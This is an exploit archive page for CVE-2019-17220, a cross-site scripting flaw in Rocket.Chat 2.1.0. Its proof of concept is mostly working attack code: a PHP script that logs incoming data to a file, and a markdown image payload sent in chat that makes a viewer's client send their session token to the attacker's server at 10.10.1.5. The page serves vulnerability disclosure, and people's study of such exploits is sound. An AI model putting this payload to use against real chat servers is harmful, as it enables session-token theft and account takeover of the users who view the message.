Rocket.Chat 2.1.0 Cross Site Scripting

Rocket.Chat 2.1.0 Cross Site Scripting: Posted Oct 23, 2019; Authored by 3H34N; Rocket.Chat version 2.1.0 suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2019-17220; SHA-256 | ac733a335a493d27656586a910398bfb94e6aef3ce4a22c9de4f99112440c929; Download | Favorite | View

Rocket.Chat 2.1.0 Cross Site Scripting

# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC
# 1. Create l33t.php on a web server

<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

# 2. Open a chat session
# 3. Send payload with your web server url

![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

# 4. Token will be written in logs.txt when target seen your message.

Top Authors In Last 30 Days

Red Hat 269 files
Ubuntu 94 files
indoushka 31 files
Gentoo 29 files
Debian 12 files
tmrswrr 7 files
Sina Kheirkhah 7 files
Google Security Research 6 files
Jann Horn 5 files
Rodolfo Tavares 4 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,084)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,556)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,418)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,700)
UNIX (9,431)
UnixWare (187)
Windows (6,667)
Other

Rocket.Chat 2.1.0 Cross Site Scripting

Rocket.Chat 2.1.0 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Rocket.Chat 2.1.0 Cross Site Scripting

Share This

Rocket.Chat 2.1.0 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems